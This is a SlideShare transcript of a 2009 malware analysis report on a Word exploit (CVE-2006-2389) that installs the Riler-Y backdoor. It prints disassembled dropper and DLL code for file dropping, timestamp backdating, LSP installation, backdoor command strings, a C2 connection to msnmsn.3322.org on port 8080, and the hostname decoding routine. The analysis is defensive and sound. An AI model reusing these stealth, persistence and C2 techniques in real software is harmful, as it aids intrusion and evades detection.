Your SlideShare is downloading. ×
Malware Analysis Report
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Malware Analysis Report

1,073

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,073
On Slideshare
0
From Embeds
0
Number of Embeds
1
Actions
Shares
0
Downloads
19
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Torrid Networks Pvt Ltd Malware Analysis Report Submitted to Confidential Submitted by Torrid Networks Pvt Ltd www.torridnetworks.com Date: 5th January, 2009 By accepting this document, you agree that neither this document nor the information disclosed herein, nor any part thereof, shall be reproduced or transferred to other documents, or used or disclosed to others for any commercial purpose except as specifically authorized in writing by Torrid. The document has been shared by Torrid for educational purpose only and shall not be held liable for any damage that you might cause by performing similar task on your machine. 1 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 2. Torrid Networks Pvt Ltd Table of Contents The Email Attachment ............................................................................................................................ 3 Behind the Curtains ............................................................................................................................. 3 The Exploit .............................................................................................................................................. 4 Anatomy of an Attacker ....................................................................................................................... 5 Observations ....................................................................................................................................... 6 File Changes & Process Binding ........................................................................................................ 6 Dynamic Analysis ........................................................................................................................ 6 Dynamic Analysis ........................................................................................................................ 7 Static Analysis ............................................................................................................................. 7 Disassembled binary in Assembly Language: ............................................................................... 7 Service Changes ............................................................................................................................. 10 Dynamic Analysis ...................................................................................................................... 10 Static Analysis ........................................................................................................................... 10 Disassembled binary in Assembly Language: ............................................................................. 10 Registry Changes ........................................................................................................................... 11 Dynamic Analysis ...................................................................................................................... 11 The Backdoor ........................................................................................................................................ 12 Static Analysis ........................................................................................................................... 12 Disassembled DLL in C Language: .............................................................................................. 12 The Control Connection ........................................................................................................................ 13 Active Attack ..................................................................................................................................... 13 Disabled Attack (Our Scenario) .......................................................................................................... 13 Dynamic Analysis ...................................................................................................................... 14 Static Analysis ........................................................................................................................... 16 Disassembled DLL in C Language:.............................................................................................. 16 Decoding the String:.................................................................................................................. 18 Summary .............................................................................................................................................. 19 Conclusion ............................................................................................................................................ 19 2 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 3. Torrid Networks Pvt Ltd The Email Attachment The sole goal of the word attachment is to transport the exploit, and to convince the reader to click on it, so the malicious code can execute. Behind the Curtains We submitted the word attachment to Virus Total and got the following result summary. The result is showing that the word file is Multistream Compound file and contains an exploit with it. The result is also showing that the controller is quite old enough. According to the previous analysis report found on the internet, the control version name at that time is Stealth 2.6 but after the whole analysis we find that this control version name is Stealth 8.1 which seems to be the latest one. 3 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 4. Torrid Networks Pvt Ltd The Exploit The email message contains a word attachment which exploits client side vulnerability “Buffer overflow” ( CVE-2006-2389 ) in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. 4 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 5. Torrid Networks Pvt Ltd Anatomy of an Attacker 5 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 6. Torrid Networks Pvt Ltd Observations File Changes & Process Binding 1. The word file exploits the vulnerability and executes the payload which creates an executable file “winsock.exe” in the Temp folder. Dynamic Analysis 2. The executable file “winsock.exe” further unpacks into two embedded components in the system32 folder: a) “feelcat.ini”: This file contains the path of winsock.exe “C:Documents and SettingsanksLocal SettingsTempwinsock.exe” b) “toonjoke.dll”: detected as Troj/Riler-Gen 3. After the files are created the backdoor binds the toonjoke.dll with svchost as a LSP(Layered Service Provider) Troj/Riler-Y will install the file toonjoke.dll as a Windows Sockets 2 transport provider and reorder the WSC Chain such that it gets called first. 6 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 7. Torrid Networks Pvt Ltd Dynamic Analysis Static Analysis Disassembled binary in Assembly Language: 1. The following Sub-Routine creates & opens File Name toonjoke.dll and writes data from 403014 and 406E14 location to toonjoke.dll sub_401000 proc near ; CODE XREF: sub_401533+4Fp Filename = dword ptr 4 push esi push offset Mode ; Mode push [esp+8+Filename] ; Filename call fopen mov esi, eax pop ecx test esi, esi pop ecx jnz short loc_401019 pop esi retn loc_401019: ; CODE XREF: sub_401000+15j push esi ; File push Count ; Count push 1 ; Size push offset dword_403014 ; Str call fwrite push 0 ; Origin push 0D0h ; Offset push esi ; File 7 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 8. Torrid Networks Pvt Ltd call fseek push esi ; File push 2 ; Count push 1 ; Size push offset dword_406E14 ; Str call fwrite push esi ; File call fclose add esp, 30h push 1 pop eax pop esi retn sub_401000 endp 2. The following Sub-Routine creates & opens File Name filecat.ini file with contents as path to the winsock.exe sub_401983 proc near ; CODE XREF: sub_401533+5Fp Filename = byte ptr -104h push ebp mov ebp, esp sub esp, 104h push esi push offset Buffer push dword_5207A4 ; Format lea eax, [ebp+Filename] push eax ; Dest call sprintf lea eax, [ebp+Filename] push offset aW ; "w" push eax ; Filename call fopen mov esi, eax add esp, 14h test esi, esi jz short loc_4019DD push esi ; File push offset Filename ; Str call fputs push esi ; File push offset Str ; "n" call fputs push esi ; File call fclose add esp, 14h loc_4019DD: ; CODE XREF: sub_401983+39j pop esi leave retn sub_401983 endp 8 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 9. Torrid Networks Pvt Ltd 3. At the following location Sub-Routine changes the timestamp to make toonjoke.dll non- searchable by clicking on “Modified Date” tab in windows Explorer. It basically sets the date for year 2000 so that the file gets mixed and doesn’t appear on the top of Windows/System32 folder as recent modified documents. loc_4010B8: ; CODE XREF: sub_401056+2Fj ; sub_401056+3Cj ... xor edi, edi push edi ; hTemplateFile push 80h ; dwFlagsAndAttributes push 3 ; dwCreationDisposition push edi ; lpSecurityAttributes push 2 ; dwShareMode push 40000000h ; dwDesiredAccess push [ebp+lpFileName] ; lpFileName call CreateFileA mov esi, eax lea eax, [ebp+CreationTime] push eax ; lpLastWriteTime lea eax, [ebp+CreationTime] push edi ; lpLastAccessTime push eax ; lpCreationTime push esi ; hFile call SetFileTime push esi ; hObject call CloseHandle pop edi pop esi pop ebx leave retn sub_401056 endp 9 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 10. Torrid Networks Pvt Ltd Service Changes A new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started. Dynamic Analysis The following snapshot shows that a new service “Windows Socket 2.0 Non-IFS Service Provider Support Environment” is started which is having a highest severity level “1”. Static Analysis Disassembled binary in Assembly Language: 1. The following Sub-Routine calls Install Provider as MSNT Service Provider loc_401674: ; CODE XREF: sub_4015B2+D6j movsx dx, Dest[ecx] mov [eax], dx inc ecx inc eax inc eax cmp ecx, 104h jl short loc_401674 lea eax, [ebp+var_10] push eax lea eax, [ebp+var_4FC] push 1 push eax lea eax, [ebp+var_704] push eax push offset dword_406F28 call WSCInstallProvider cmp eax, 0FFFFFFFFh jz loc_4018DC call sub_401976 call sub_401903 xor esi, esi 10 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 11. Torrid Networks Pvt Ltd cmp dword_5207AC, ebx jle short loc_401701 2. The following Sub-Routine calls Install Provider as MSNT Service Chain loc_401786: ; CODE XREF: sub_4015B2+154j lea eax, [ebp+var_10] push eax lea eax, [ebp+var_B78] push esi push eax lea eax, [ebp+var_704] push eax push offset dword_406F38 call WSCInstallProvider cmp eax, 0FFFFFFFFh jnz short loc_4017BC push [ebp+var_10] push offset aWscinstallprov ; "WSCInstallProvider for chain Error: %d" call printf pop ecx pop ecx jmp loc_4018DC Registry Changes The following changes in the registry were observed. Dynamic Analysis 11 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 12. Torrid Networks Pvt Ltd The Backdoor After the successful exploitation a backdoor Trojan of Troj/Riler-Y family is installed. Static Analysis Disassembled DLL in C Language: The following is the list of commands that can be received from the Control Server of the Trojan after the successful connection with the compromised client. Network traffic from client to server also contains the string “VER: Stealth 8.1” along with IP address, Netbios name, OS Version, etc. of the compromised host. void __thiscall sub_10001970(char *this) { char *EndPtr; // [sp+0h] [bp-4h]@1 EndPtr = this; off_100059F0 = "VER: Stealth 8.1"; lpName = "whX3656"; off_100059F8 = "LOCK"; off_100059FC = "SEND"; Format = "%sMS_Woople.ini"; off_10005A10 = "WAKE"; off_10005A14 = "NAME"; off_10005A18 = "MOON"; off_10005A1C = "KEEP"; off_10005A20 = "DISK"; off_10005A24 = "FILE"; off_10005A28 = "DONE"; off_10005A2C = "DOWN"; off_10005A30 = "LONG"; off_10005A34 = "MAKE"; off_10005A38 = "ATTR"; off_10005A3C = "KILL"; off_10005A40 = "LIKE"; off_10005A44 = "SEEK"; off_10005A48 = "READ"; off_10005A4C = "DEAD"; off_10005A50 = "DDLL"; off_10005A54 = "AUTO"; lpString2 = "DIR:"; byte_10005A74 = "NAME: %s"; off_10005A78 = "L_IP: %s"; off_10005A7C = "MARK: "; off_10005A80 = "OS: NT"; off_10005A84 = "OS: WN"; off_10005A88 = "%ssourcejob.dat"; off_10005A8C = "%suidmngr.ini"; off_10005A90 = "%stupix.ini"; off_10005AB0[0] = "ERR code = "; off_10005AB4 = "F zzz <more>"; off_10005AB8 = "READY"; off_10005ABC = "END:"; off_10005AC0 = "DRIVE %c:"; off_10005AC4 = "C:*.*"; off_10005AC8 = "%s00"; dword_1000580C = 371; dword_10005810 = strtol("99C", &EndPtr, 10); sub_10001930(); 12 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 13. Torrid Networks Pvt Ltd The Control Connection Active Attack In order for the Trojan to be effective it needs the Compromise Client to make a successful connection with the Control Server which is a two step process: 1. A DNS lookup to acquire the address of the control server; 2. The actual connection. Disabled Attack (Our Scenario) In our scenario the Compromised Client did not find the address of the Control Server, so a Control connection is not established between them and the Compromised Client not able to receive the commands from the Control Server. 13 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 14. Torrid Networks Pvt Ltd Dynamic Analysis The following packet capture shows that client was not able to find the address for msnmsn.3322.org. 14 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 15. Torrid Networks Pvt Ltd The following packet capture shows that the compromised client wants to establish a connection with the control server (msnmsn.3322.org) on port number 8080. To get going with the analysis, a local and unauthorized DNS server was setup for domain name 3322.org with A record for msnmsn.3322.org pointing to 10.1.1.130 which is our own honeypot server used for analysis. 15 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 16. Torrid Networks Pvt Ltd Static Analysis Disassembled DLL in C Language: The following code creates a socket with the encrypted hostname FLGFLGejjiieHK@ (msnmsn.3322.org) and on port number ogog (8080). signed int __cdecl sub_10002450() { int v0; // edi@1 int v1; // ecx@3 char *v2; // edx@4 int v3; // ecx@4 LPSTR (__stdcall *v4)(LPSTR, LPCSTR); // ebx@4 HANDLE v5; // ebp@6 u_short v6; // si@6 signed int v8; // esi@38 int v9; // esi@50 const CHAR *v10; // edi@51 HANDLE v11; // esi@72 SOCKET v12; // [sp-Ch] [bp-E8h]@15 char *v13; // [sp-8h] [bp-E4h]@4 const char *v14; // [sp-8h] [bp-E4h]@15 const char *v15; // [sp-8h] [bp-E4h]@46 int v16; // [sp-4h] [bp-E0h]@4 int v17; // [sp-4h] [bp-E0h]@14 char *v18; // [sp-4h] [bp-E0h]@46 char Str; // [sp+10h] [bp-CCh]@4 HANDLE hObject; // [sp+18h] [bp-C4h]@6 CHAR String1; // [sp+1Ch] [bp-C0h]@4 char v22; // [sp+5Ch] [bp-80h]@45 sub_10002CB0(); v0 = 0; if ( !dword_100064F4 ) sub_10002BB0(); v1 = dword_100064F0++; if ( v1 <= 5 ) { v4 = lstrcpyA; lstrcpyA(&String1, "FLGFLGejjiieHK@ "); //Host Name msnmsn.3322.org v2 = &Str; v16 = (int)"ogog "; //Port 8080 v13 = &Str; } else { v4 = lstrcpyA; dword_100064F0 = 0; lstrcpyA(&String1, "FLGFLGejjiieHK@ "); v16 = (int)"ogog "; v13 = &Str; } ((void (__fastcall *)(int, char *, char *, int))v4)(v3, v2, v13, v16); sub_10002E60(&String1); sub_10002E60(&Str); 16 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 17. Torrid Networks Pvt Ltd Following Code Decodes the hostname and port number by subtracting 55 to the Decimal value of the ACSII character. signed int __cdecl sub_10002E60(const char *a1) { signed int result; // eax@1 int v2; // edx@1 unsigned int v3; // kr00_4@1 result = 0; v2 = 0; v3 = strlen(a1); if ( (signed int)(v3 - 1) > 0 ) { do { result = a1[v2]; if ( result == 32 ) { a1[v2] = 0; } else { result -= 55; if ( result < 33 ) result += 94; a1[v2] = result; } ++v2; } while ( v2 < (signed int)(v3 - 1) ); } return result; } 17 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 18. Torrid Networks Pvt Ltd Decoding the String: As per the above logic the following table decodes the encrypted character string which results hostname as “msnmsn.3322.org” and port number as”8080” Characters from Decimal Value Result = Dec Value If (Result<33) Decoded String - 55 Result + 94 Character F 70 15 109 m L 76 21 115 s G 71 16 110 n F 70 15 109 m L 76 21 115 s G 71 16 110 n e 101 46 . j 106 51 3 j 106 51 3 i 105 50 2 i 105 50 2 e 101 46 . H 72 17 111 o K 75 20 114 r @ 64 9 103 g o 111 56 8 g 103 48 0 o 111 56 8 g 103 48 0 18 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com
  • 19. Torrid Networks Pvt Ltd Summary The control server for the backdoor was setup at msnmsn.3322.org (Encoded as FLGFLGejjiieHK@ in the DLL as shown above) which originates at China and this attack is pretty old one and it seems that federal agencies have already taken down the host name msnmsn.3322.org and there is no DNS record for this sub-domain. Backdoor is intelligently programmed to resolve the domain name msnmsn.3322.org to IP address by doing the DNS lookup with some delay inherited, hence making it difficult to catch while analyzing network traffic. Also, there is no network activity from the backdoor till the time DNS lookup is not done. To check for the network activity of the trojan, we setup a local DNS server with master DNS zone 3322.org and thereafter we added another A record msnmsn.3322.org pointing to our internal server running with honeypot. We simulated the backdoor setup once again to see the DNS query being resolved by the backdoor as IP of honeypot. We captured the traffic using sniffer tool and found that after getting positive response from the DNS query, backdoor again waits for few minutes just to confuse the researcher and after a delay, it establishes TCP connection to the resolved IP address (in our case, honeypot’s IP) at the port number 8080 (encoded as ogog in the DLL as shown above). After establishing the connection at port 8080, it waits for some inputs from the server before performing any activity. Since the control server has been shutdown hence backdoor doesn’t get the commands from the remote server and stays as a stealth backdoor waiting for its master to come live again. This particular attack was reported in around 2005 and the backdoor payload is very old which was firstly reported in 2002 and was named as Riler-Y Trojan and there have been few variants from this family in the past. Most of the time, these are part of targeted attack and are not the attacks on the wild. Analysis suggests that the version for controller is Stealth 8.1 which seems to be new version of controller with more features like remote VNC, command, DLL injection, etc. Conclusion Though the attack cannot be treated as successful attack due to unavailability of control server which was supposed to be hosted at msnmsn.3322.org, it is highly recommended to remove the Trojan manually by following above analysis report or using some antivirus software from the already compromised machine to avoid losing the control to attacker in case the dead control server is made live again. Also, use patched version of MS Office for older versions (2000, 2003) or it is always recommended to use the latest product release (MS Office 2007 in this case). Contact/Feedback: info@torridnetworks.com 19 Unauthorized copying for any commercial purpose without permission is highly prohibited. B-134, Sector –6, Noida – 201301 | Phone: +91-120-4545100 | Fax: +91-120-4235064 | www.torridnetworks.com

×